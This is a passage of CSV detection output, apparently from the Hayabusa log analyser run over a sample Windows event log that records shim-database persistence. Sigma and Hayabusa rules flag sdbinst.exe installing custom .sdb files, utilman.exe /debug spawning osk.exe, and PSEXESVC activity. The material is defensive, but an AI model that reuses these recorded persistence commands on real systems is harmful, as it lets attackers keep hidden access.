Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 
